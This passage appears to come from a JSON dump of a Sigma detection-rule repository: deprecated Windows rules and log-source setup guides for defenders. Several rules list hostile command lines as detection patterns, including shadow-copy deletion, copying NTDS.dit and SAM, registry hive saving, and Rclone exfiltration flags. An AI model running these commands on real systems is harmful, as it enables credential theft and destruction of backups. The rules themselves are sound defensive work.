'--auto-confirm'\n            - '--transfers'\n            - '--multi-thread-streams'\n    condition: 1 of selection*\n"
  },
  {
    "path": "deprecated/windows/win_defender_disabled.yml",
    "content": "title: Windows Defender Threat Detection Disabled\nid: fe34868f-6e0e-4882-81f6-c43aa8f15b62\nstatus: deprecated\ndescription: Detects the disabling of Windows Defender threat protection\nreferences:\n    - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: Ján Trenčanský, frack113\ndate: 2020/07/28\nmodified: 2023/11/22\ntags:\n    - attack.defense_evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: windefend\ndetection:\n    selection:\n        EventID:\n            - 5001 # Real-time protection is disabled.\n            - 5010 # Scanning for malware and other potentially unwanted software is disabled.\n            - 5012 # Scanning for viruses is disabled.\n            - 5101 # The antimalware platform is expired.\n    condition: selection\nfalsepositives:\n    - Administrator actions (should be investigated)\n    - Seen being triggered occasionally during Windows 8 Defender updates\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/win_dsquery_domain_trust_discovery.yml",
    "content": "title: Domain Trust Discovery\nid: 77815820-246c-47b8-9741-e0def3f57308\nstatus: deprecated\ndescription: Detects discovery of domain trusts.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md\nauthor: Jakob Weinzettl, oscd.community\ndate: 2019/10/23\nmodified: 2023/02/04\ntags:\n    - attack.discovery\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n      - Image|endswith: '\\dsquery.exe'\n        CommandLine|contains|all:\n            - '-filter'\n            - 'trustedDomain'\n      - Image|endswith: '\\nltest.exe'\n        CommandLine|contains: 'domain_trusts'\n    condition: selection\nfalsepositives:\n    - Administration of systems.\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/win_lateral_movement_condrv.yml",
    "content": "title: Lateral Movement Indicator ConDrv\nid: 29d31aee-30f4-4006-85a9-a4a02d65306c\nstatus: deprecated #Too many FP\ndescription: This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. The account name within the event contains the compromised user account name. This event should be correlated with 4624 and 4688 for further intrusion context.\nauthor: Janantha Marasinghe\ndate: 2021/04/27\nmodified: 2022/05/14\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/wmiexec-vbs.htm\n    - https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html\ntags:\n    - attack.lateral_movement\n    - attack.execution\n    - attack.t1021\n    - attack.t1059\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4674\n        ObjectServer: 'Security'\n        ObjectType: 'File'\n        ObjectName: '\\Device\\ConDrv'\n    condition: selection\nfalsepositives:\n    - Legitimate admin action\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/win_security_event_log_cleared.yml",
    "content": "title: Security Event Log Cleared\nid: a122ac13-daf8-4175-83a2-72c387be339d\nstatus: deprecated\ndescription: Checks for event id 1102 which indicates the security event log was cleared.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml\nauthor: Saw Winn Naung\ndate: 2021/08/15\nmodified: 2023/12/06\ntags:\n    - attack.t1070.001\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID: 1102\n        Provider_Name: Microsoft-Windows-Eventlog\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nfields:\n    - SubjectLogonId\n    - SubjectUserName\n    - SubjectUserSid\n    - SubjectDomainName\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/win_security_group_modification_logging.yml",
    "content": "title: Group Modification Logging\nid: 9cf01b6c-e723-4841-a868-6d7f8245ca6e\nstatus: deprecated\ndescription: |\n  Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\n  Sigma detects:\n  Event ID 4728 indicates a \"Member is added to a Security Group\".\n  Event ID 4729 indicates a \"Member is removed from a Security enabled-group\".\n  Event ID 4730 indicates a \"Security Group is deleted\".\n  The case is not applicable for Unix OS.\n  Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10, Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2019/03/26\nmodified: 2023/04/26\n# tags:\n    # - CSC4\n    # - CSC4.8\n    # - NIST CSF 1.1 PR.AC-4\n    # - NIST CSF 1.1 PR.AT-2\n    # - NIST CSF 1.1 PR.MA-2\n    # - NIST CSF 1.1 PR.PT-3\n    # - ISO 27002-2013 A.9.1.1\n    # - ISO 27002-2013 A.9.2.2\n    # - ISO 27002-2013 A.9.2.3\n    # - ISO 27002-2013 A.9.2.4\n    # - ISO 27002-2013 A.9.2.5\n    # - ISO 27002-2013 A.9.2.6\n    # - ISO 27002-2013 A.9.3.1\n    # - ISO 27002-2013 A.9.4.1\n    # - ISO 27002-2013 A.9.4.2\n    # - ISO 27002-2013 A.9.4.3\n    # - ISO 27002-2013 A.9.4.4\n    # - PCI DSS 3.2 2.1\n    # - PCI DSS 3.2 7.1\n    # - PCI DSS 3.2 7.2\n    # - PCI DSS 3.2 7.3\n    # - PCI DSS 3.2 8.1\n    # - PCI DSS 3.2 8.2\n    # - PCI DSS 3.2 8.3\n    # - PCI DSS 3.2 8.7\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4728 # A member was added to a security-enabled global group\n            - 4729 # A member was removed from a security-enabled global group\n            - 4730 # A security-enabled global group was deleted\n            - 633 # Security Enabled Global Group Member Removed\n            - 632 # Security Enabled Global Group Member Added\n            - 634 # Security Enabled Global Group Deleted\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/win_security_lolbas_execution_of_nltest.yml",
    "content": "title: Correct Execution of Nltest.exe\nid: eeb66bbb-3dde-4582-815a-584aee9fe6d1\nstatus: deprecated\ndescription: An attacker might use the LOLBAS nltest.exe for discovery of domain controllers, domain trusts, the parent domain and the current user's permissions.\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm\n    - https://attack.mitre.org/software/S0359/\nauthor: Arun Chauhan\ndate: 2021/10/04\nmodified: 2023/02/02\ntags:\n    - attack.discovery\n    - attack.t1482 # enumerate trusted domains by using commands such as nltest /domain_trusts\n    - attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc\n    - attack.t1016 # enumerate the parent domain of a local machine using /parentdomain\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4689\n        ProcessName|endswith: 'nltest.exe'\n        Status: '0x0'\n    condition: selection\nfields:\n    - 'SubjectUserName'\n    - 'SubjectDomainName'\nfalsepositives:\n    - Red team activity\n    - Rare legitimate use by an administrator\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/win_security_windows_defender_exclusions_write_deleted.yml",
    "content": "title: Windows Defender Exclusion Deleted\nid: a33f8808-2812-4373-ae95-8cfb82134978\nrelated:\n    - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d\n      type: derived\n    - id: 46a68649-f218-4f86-aea1-16a759d81820\n      type: derived\nstatus: deprecated\ndescription: |\n    Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to cover their tracks by removing the exclusions they added.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/\nauthor: '@BarryShooshooga'\ndate: 2019-10-26\nmodified: 2025-01-30\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User'\ndetection:\n    selection:\n        EventID: 4660 # An object was deleted.\n        ObjectName|contains: '\\Microsoft\\Windows Defender\\Exclusions\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/win_susp_esentutl_activity.yml",
    "content": "title: Suspicious Esentutl Use\nid: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7\nstatus: deprecated\ndescription: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. \nauthor: Florian Roth (Nextron Systems)\ndate: 2020/05/23\nmodified: 2022/04/11\nreferences:\n    - https://lolbas-project.github.io/\n    - https://twitter.com/chadtilbury/status/1264226341408452610\ntags:\n    - attack.defense_evasion\n    - attack.execution\n    - attack.s0404\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' /vss '\n            - ' /y '\n    condition: selection\nfields:\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/win_susp_rclone_exec.yml",
    "content": "title: Rclone Execution via Command Line or PowerShell\nid: cb7286ba-f207-44ab-b9e6-760d82b84253\ndescription: Detects Rclone, which is commonly used by ransomware groups for exfiltration\nstatus: deprecated\ndate: 2021/05/26\nmodified: 2022/04/11\nauthor: Aaron Greetham (@beardofbinary) - NCC Group\nreferences:\n    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nfalsepositives:\n    - Legitimate Rclone usage (rare)\nlevel: high\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    exec_selection:\n        Image|endswith: '\\rclone.exe'\n        ParentImage|endswith:\n            - '\\PowerShell.exe'\n            - '\\cmd.exe'\n    command_selection:\n        CommandLine|contains:\n            - ' pass '\n            - ' user '\n            - ' copy '\n            - ' mega '\n            - ' sync '\n            - ' config '\n            - ' lsd '\n            - ' remote '\n            - ' ls '\n    description_selection:\n        Description: 'Rsync for cloud storage'\n    condition: command_selection and ( description_selection or exec_selection )\n"
  },
  {
    "path": "deprecated/windows/win_susp_vssadmin_ntds_activity.yml",
    "content": "title: Activity Related to NTDS.dit Domain Hash Retrieval\nid: b932b60f-fdda-4d53-8eda-a170c1d97bbd\nstatus: deprecated\ndescription: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely\nauthor: Florian Roth (Nextron Systems), Michael Haag\ndate: 2019/01/16\nmodified: 2022/04/11\nreferences:\n    - https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/\n    - https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/\n    - https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/\n    - https://securingtomorrow.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/\n    - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/\ntags:\n    - attack.credential_access\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine:\n            - 'vssadmin.exe Delete Shadows'\n            - 'vssadmin create shadow /for=C:'\n            - 'copy \\\\?\\GLOBALROOT\\Device\\\\*\\windows\\ntds\\ntds.dit'\n            - 'copy \\\\?\\GLOBALROOT\\Device\\\\*\\config\\SAM'\n            - 'vssadmin delete shadows /for=C:'\n            - 'reg SAVE HKLM\\SYSTEM '\n            - 'esentutl.exe /y /vss *\\ntds.dit*'\n            - 'esentutl.exe /y /vss *\\SAM'\n            - 'esentutl.exe /y /vss *\\SYSTEM'\n    condition: selection\nfields:\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/win_system_service_install_susp_double_ampersand.yml",
    "content": "title: New Service Uses Double Ampersand in Path\nid: ca83e9f3-657a-45d0-88d6-c1ac280caf53\nstatus: deprecated\ndescription: Detects a service installation whose image path value contains a suspicious double ampersand\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/07/05\nmodified: 2023/11/15\ntags:\n    - attack.defense_evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains: '&&'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/win_system_susp_sam_dump.yml",
    "content": "title: SAM Dump to AppData\nid: 839dd1e8-eda8-4834-8145-01beeee33acd\nstatus: deprecated\ndescription: Detects suspicious SAM dump activity as caused by QuarksPwDump and other password dumpers\nauthor: Florian Roth (Nextron Systems)\ndate: 2018/01/27\nmodified: 2024/01/18\ntags:\n    - attack.credential_access\n    - attack.t1003.002\nlogsource:\n    product: windows\n    service: system\n    definition: The source of this type of event is Kernel-General\ndetection:\n    selection:\n        Provider_Name: Microsoft-Windows-Kernel-General\n        EventID: 16\n    keywords:\n        '|all':\n            - '\\AppData\\Local\\Temp\\SAM-'\n            - '.dmp'\n    condition: selection and keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "documentation/README.md",
    "content": ""
  },
  {
    "path": "documentation/logsource-guides/other/antivirus.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/category/process_creation.md",
    "content": "# category: process_creation\n\nID: 2ff912e8-159f-4789-a2ef-761292b32a23\n\n## Content\n\n<details>\n    <summary>Expand</summary>\n\n- [category: process\\_creation](#category-process_creation)\n  - [Content](#content)\n  - [Description](#description)\n  - [Event Source(s)](#event-sources)\n  - [Logging Setup](#logging-setup)\n    - [Microsoft Windows Security Auditing](#microsoft-windows-security-auditing)\n      - [Process Creation](#process-creation)\n      - [Include Command-Line In Process Creation Events](#include-command-line-in-process-creation-events)\n    - [Microsoft-Windows-Sysmon](#microsoft-windows-sysmon)\n      - [Process Creation](#process-creation-1)\n  - [Event Fields](#event-fields)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4688](#provider-microsoft-windows-security-auditing--eventid-4688)\n    - [Provider: Microsoft-Windows-Sysmon / EventID: 1](#provider-microsoft-windows-sysmon--eventid-1)\n\n</details>\n\n## Description\n\nThis logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `process_creation` category.\n\n## Event Source(s)\n\nThis section describes the event source(s) that must be collected in order to receive the events used by the `process_creation` category detection rules.\n\n```yml\nProvider: Microsoft Windows Security Auditing\nGUID: {54849625-5478-4994-a5ba-3e3b0328c30d}\nChannel: Security\nEventID: 4688\n```\n\n```yml\nProvider: Microsoft-Windows-Sysmon\nGUID: {5770385f-c22a-43e0-bf4c-06f5698ffbd9}\nChannel: Microsoft-Windows-Sysmon/Operational\nEventID: 1\n```\n\n## Logging Setup\n\nThis section describes how to set up logging in your environment.\n\n### Microsoft Windows Security Auditing\n\n#### Process Creation\n\n- Subcategory GUID: `{0CCE922B-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- EventID(s):\n  - `4688`\n\nIf you're using `gpedit.msc` or similar, you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Detailed Tracking\n                        - Audit Process Creation\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category, you can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation)\n\n#### Include Command-Line In Process Creation Events\n\nIf you're using `gpedit.msc` or similar, you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Administrative Templates\n        - System\n            - Audit Process Creation\n                - Include Command Line In Process Creation Events\n```\n\n### Microsoft-Windows-Sysmon\n\n#### Process Creation\n\n- Provider: `Microsoft-Windows-Sysmon`\n- Channel: `Microsoft-Windows-Sysmon/Operational`\n- Event Volume: `High`\n- EventID(s):\n  - `1`\n\nTo configure Sysmon process creation events, you can follow the instructions below\n\n- Download [Sysmon](https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon)\n- Install Sysmon using an appropriate configuration. The configuration must include a `<ProcessCreate>` element. We recommend the following configuration [sysmonconfig-export.xml](https://github.com/Neo23x0/sysmon-config/blob/master/sysmonconfig-export.xml).\n\n```powershell\nsysmon -i /path/to/config\n```\n\n## Event Fields\n\n> **Note**\n>\n> For rules using this category in SIGMA, know that there is a mapping between `Sysmon EID 1` fields and `Microsoft Windows Security Auditing EID: 4688`. While you can use the fields of `EID 4688`, it's best to use the Sysmon ones.\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4688\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- NewProcessId\n- NewProcessName\n- TokenElevationType\n- ProcessId\n- CommandLine\n- TargetUserSid\n- TargetUserName\n- TargetDomainName\n- TargetLogonId\n- ParentProcessName\n- MandatoryLabel\n```\n\n</details>\n\n### Provider: Microsoft-Windows-Sysmon / EventID: 1\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- RuleName\n- UtcTime\n- ProcessGuid\n- ProcessId\n- Image\n- FileVersion\n- Description\n- Product\n- Company\n- OriginalFileName\n- CommandLine\n- CurrentDirectory\n- User\n- LogonGuid\n- LogonId\n- TerminalSessionId\n- IntegrityLevel\n- Hashes\n- ParentProcessGuid\n- ParentProcessId\n- ParentImage\n- ParentCommandLine\n- ParentUser\n```\n\n</details>\n"
  },
  {
    "path": "documentation/logsource-guides/windows/category/ps_module.md",
    "content": "# category: ps_module\n\nID: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\n\n## Content\n\n<details>\n    <summary>Expand</summary>\n\n- [category: ps\\_module](#category-ps_module)\n  - [Content](#content)\n  - [Description](#description)\n  - [Event Source(s)](#event-sources)\n    - [PowerShell 5](#powershell-5)\n    - [PowerShell 7](#powershell-7)\n  - [Logging Setup](#logging-setup)\n    - [Microsoft-Windows-PowerShell](#microsoft-windows-powershell)\n    - [Provider: PowerShellCore](#provider-powershellcore)\n  - [Event Fields](#event-fields)\n    - [Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)](#provider-microsoft-windows-powershell--eventid-4103-powershell-5)\n    - [Provider: PowerShellCore / EventID: 4103 (PowerShell 7)](#provider-powershellcore--eventid-4103-powershell-7)\n\n</details>\n\n## Description\n\nThis logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `ps_module` category.\n\n## Event Source(s)\n\n### PowerShell 5\n\n```yml\nProvider: Microsoft-Windows-PowerShell\nGUID: {a0c1853b-5c40-4b15-8766-3cf1c58f985a}\nChannel: Microsoft-Windows-PowerShell/Operational\nEventID: 4103\n```\n\n### PowerShell 7\n\n```yml\nProvider: PowerShellCore\nGUID: {f90714a8-5509-434a-bf6d-b1624c8a19a2}\nChannel: PowerShellCore/Operational\nEventID: 4103\n```\n\n## Logging Setup\n\n### Microsoft-Windows-PowerShell\n\n- Event Volume: TBD\n- EventID(s):\n  - `4103`\n\nIf you're using `gpedit.msc` or similar, you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Administrative Templates\n        - Windows Components\n            - Windows PowerShell\n                - Turn On Module Logging\n                  - Select List Of Modules According To Your Audit Policy (or use '*' to select all modules)\n```\n\n### Provider: PowerShellCore\n\n- Event Volume: TBD\n- EventID(s):\n  - `4103`\n\nIf you're using `gpedit.msc` or similar, you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Administrative Templates\n        - PowerShell Core\n            - Turn On Module Logging\n              - Select List Of Modules According To Your Audit Policy (or use '*' to select all modules)\n```\n\n> **Note**\n>\n> By default, when you install PowerShell 7, the logging template isn't available. You can install it by using the PowerShell script available in the installation directory, `InstallPSCorePolicyDefinitions.ps1`.\n\n## Event Fields\n\n### Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- ContextInfo\n- UserData\n- Payload\n```\n\n</details>\n\n### Provider: PowerShellCore / EventID: 4103 (PowerShell 7)\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- ContextInfo\n- UserData\n- Payload\n```\n\n</details>\n"
  },
  {
    "path": "documentation/logsource-guides/windows/category/ps_script.md",
    "content": "# category: ps_script\n\nID: bade5735-5ab0-4aa7-a642-a11be0e40872\n\n## Content\n\n<details>\n    <summary>Expand</summary>\n\n- [category: ps\\_script](#category-ps_script)\n  - [Content](#content)\n  - [Description](#description)\n  - [Event Source(s)](#event-sources)\n    - [PowerShell 5](#powershell-5)\n    - [PowerShell 7](#powershell-7)\n  - [Logging Setup](#logging-setup)\n    - [Provider: Microsoft-Windows-PowerShell](#provider-microsoft-windows-powershell)\n    - [Provider: PowerShellCore](#provider-powershellcore)\n  - [Event Fields](#event-fields)\n    - [Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)](#provider-microsoft-windows-powershell--eventid-4103-powershell-5)\n    - [Provider: PowerShellCore / EventID: 4103 (PowerShell 7)](#provider-powershellcore--eventid-4103-powershell-7)\n\n</details>\n\n## Description\n\nThis logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `ps_script` category.\n\n## Event Source(s)\n\n### PowerShell 5\n\n```yml\nProvider: Microsoft-Windows-PowerShell\nGUID: {a0c1853b-5c40-4b15-8766-3cf1c58f985a}\nChannel: Microsoft-Windows-PowerShell/Operational\nEventID: 4104\n```\n\n### PowerShell 7\n\n```yml\nProvider: PowerShellCore\nGUID: {f90714a8-5509-434a-bf6d-b1624c8a19a2}\nChannel: PowerShellCore/Operational\nEventID: 4104\n```\n\n## Logging Setup\n\n### Provider: Microsoft-Windows-PowerShell\n\n- Event Volume: TBD\n- EventID(s):\n  - `4104`\n\nIf you're using `gpedit.msc` or similar, you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Administrative Templates\n        - Windows Components\n            - Windows PowerShell\n                - Turn On PowerShell Script Block Logging\n```\n\n### Provider: PowerShellCore\n\n- Event Volume: TBD\n- EventID(s):\n  - `4104`\n\nIf you're using `gpedit.msc` or similar, you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Administrative Templates\n        - PowerShell Core\n            - Turn On PowerShell Script Block Logging\n```\n\n> **Note**\n>\n> By default, when you install PowerShell 7, the logging template isn't available. You can install it by using the PowerShell script available in the installation directory, `InstallPSCorePolicyDefinitions.ps1`.\n\n## Event Fields\n\n### Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- MessageNumber\n- MessageTotal\n- ScriptBlockText\n- ScriptBlockId\n- Path\n```\n\n</details>\n\n### Provider: PowerShellCore / EventID: 4103 (PowerShell 7)\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- MessageNumber\n- MessageTotal\n- ScriptBlockText\n- ScriptBlockId\n- Path\n```\n\n</details>\n"
  },
  {
    "path": "documentation/logsource-guides/windows/category/registry_add.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/category/registry_delete.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/category/registry_event.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/category/registry_rename.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/category/registry_set.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/service/powershell.md",
    "content": "**Coming Soon**"
  },
  {
    "path": "documentation/logsource-guides/windows/service/security.md",
    "content": "# service: security\n\nID: dfd8c0f4-e6ad-4e07-b91b-f2fca0ddef64\n\n## Content\n\n<details>\n    <summary>Details</summary>\n\n- [service: security](#service-security)\n  - [Content](#content)\n  - [Description](#description)\n  - [Event Source(s)](#event-sources)\n  - [Logging Setup](#logging-setup)\n    - [Account Logon](#account-logon)\n      - [Credential Validation](#credential-validation)\n      - [Kerberos Authentication Service](#kerberos-authentication-service)\n      - [Kerberos Service Ticket Operations](#kerberos-service-ticket-operations)\n      - [Other Account Logon Events](#other-account-logon-events)\n    - [Account Management](#account-management)\n      - [Application Group Management](#application-group-management)\n      - [Computer Account Management](#computer-account-management)\n      - [Distribution Group Management](#distribution-group-management)\n      - [Other Account Management Events](#other-account-management-events)\n      - [Security Group Management](#security-group-management)\n      - [User Account Management](#user-account-management)\n    - [Detailed Tracking](#detailed-tracking)\n      - [DPAPI Activity](#dpapi-activity)\n      - [PNP Activity](#pnp-activity)\n      - [Process Creation](#process-creation)\n      - [Process Termination](#process-termination)\n      - [RPC Events](#rpc-events)\n      - [Token Right Adjusted](#token-right-adjusted)\n    - [DS Access](#ds-access)\n      - [Detailed Directory Service Replication](#detailed-directory-service-replication)\n      - [Directory Service Access](#directory-service-access)\n      - [Directory Service Changes](#directory-service-changes)\n      - [Directory Service Replication](#directory-service-replication)\n    - [Logon/Logoff](#logonlogoff)\n      - [Account Lockout](#account-lockout)\n      - [User/Device Claims](#userdevice-claims)\n      - [Group Membership](#group-membership)\n      - [IPsec Extended Mode](#ipsec-extended-mode)\n      - [IPsec Main Mode](#ipsec-main-mode)\n      - [IPsec Quick Mode](#ipsec-quick-mode)\n      - [Logoff](#logoff)\n      - [Logon](#logon)\n      - [Network Policy Server](#network-policy-server)\n      - [Other Logon/Logoff Events](#other-logonlogoff-events)\n      - [Special Logon](#special-logon)\n    - [Object Access](#object-access)\n      - [Application Generated](#application-generated)\n      - [Certification Services](#certification-services)\n      - [Detailed File Share](#detailed-file-share)\n      - [File Share](#file-share)\n      - [File System](#file-system)\n      - [Filtering Platform Connection](#filtering-platform-connection)\n      - [Filtering Platform Packet Drop](#filtering-platform-packet-drop)\n      - [Handle Manipulation](#handle-manipulation)\n      - [Kernel Object](#kernel-object)\n      - [Other Object Access Events](#other-object-access-events)\n      - [Registry](#registry)\n      - [Removable Storage](#removable-storage)\n      - [SAM](#sam)\n      - [Central Access Policy Staging](#central-access-policy-staging)\n    - [Policy Change](#policy-change)\n      - [Audit Policy Change](#audit-policy-change)\n      - [Authentication Policy Change](#authentication-policy-change)\n      - [Authorization Policy Change](#authorization-policy-change)\n      - [Filtering Platform Policy Change](#filtering-platform-policy-change)\n      - [MPSSVC Rule-Level Policy Change](#mpssvc-rule-level-policy-change)\n      - [Other Policy Change Events](#other-policy-change-events)\n    - [Privilege Use](#privilege-use)\n      - [Non Sensitive Privilege Use](#non-sensitive-privilege-use)\n      - [Other Privilege Use Events](#other-privilege-use-events)\n      - [Sensitive Privilege Use](#sensitive-privilege-use)\n    - [System](#system)\n      - [IPsec Driver](#ipsec-driver)\n      - [Other System Events](#other-system-events)\n      - [Security State Change](#security-state-change)\n      - [Security System Extension](#security-system-extension)\n      - [System Integrity](#system-integrity)\n    - [Global Object Access Auditing](#global-object-access-auditing)\n  - [Full Event(s) List](#full-events-list)\n  - [Event Fields](#event-fields)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4624](#provider-microsoft-windows-security-auditing--eventid-4624)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4627](#provider-microsoft-windows-security-auditing--eventid-4627)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4663](#provider-microsoft-windows-security-auditing--eventid-4663)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4670](#provider-microsoft-windows-security-auditing--eventid-4670)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4672](#provider-microsoft-windows-security-auditing--eventid-4672)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4673](#provider-microsoft-windows-security-auditing--eventid-4673)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4688](#provider-microsoft-windows-security-auditing--eventid-4688)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4689](#provider-microsoft-windows-security-auditing--eventid-4689)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4702](#provider-microsoft-windows-security-auditing--eventid-4702)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4703](#provider-microsoft-windows-security-auditing--eventid-4703)\n    - [Provider: Microsoft Windows Security Auditing / EventID: 4957](#provider-microsoft-windows-security-auditing--eventid-4957)\n    - [Provider: Microsoft Windows Security Auditing / 